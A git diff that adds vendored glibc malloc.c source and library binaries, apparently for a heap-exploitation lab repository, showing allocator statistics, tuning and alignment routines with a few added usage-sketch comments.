+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
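+
+/* For an in-use, non-mmapped chunk the usable size is the chunk size minus
+   one size field, so it is usually a little larger than what was requested;
+   e.g. on a typical 64-bit build malloc (100) is backed by a 112-byte chunk
+   and malloc_usable_size () reports 104.  */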
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
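+
+/* Usage sketch (not part of the upstream sources):
+
+     mallopt (M_MMAP_THRESHOLD, 1 << 20);  // serve requests of roughly 1 MiB
+                                           // and up with mmap and disable
+                                           // the dynamic threshold
+     mallopt (M_PERTURB, 0xAA);            // fill allocated and freed memory
+                                           // with marker bytes
+ */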
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
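+
+/* A minimal sketch of the "always fail" MORECORE mentioned above (an
+   illustration, not something shipped with this file):
+
+     static void *
+     fail_morecore (ptrdiff_t increment)
+     {
+       return (void *) MORECORE_FAILURE;  // push sysmalloc onto the mmap path
+     }
+
+   Building with MORECORE defined to fail_morecore (and MORECORE_CONTIGUOUS
+   set to 0) makes every extension of the heap come from mmap rather than
+   sbrk.  */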
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
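+
+/* Usage sketch (not part of the upstream sources): the alignment must be a
+   power-of-two multiple of sizeof (void *), e.g. on a 64-bit build
+
+     void *p;
+     int rc = posix_memalign (&p, 64, 1000);   // ok: rc == 0, p % 64 == 0
+     rc = posix_memalign (&p, 48, 1000);       // 48 / 8 == 6 is not a power
+                                               // of two, so rc == EINVAL
+ */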
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so
new file mode 100755
index 0000000..50b152a
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2
new file mode 120000
index 0000000..694f035
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so
new file mode 100755
index 0000000..554a063
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6
new file mode 120000
index 0000000..a5e9e38
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..00ce48c
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c
@@ -0,0 +1,5589 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
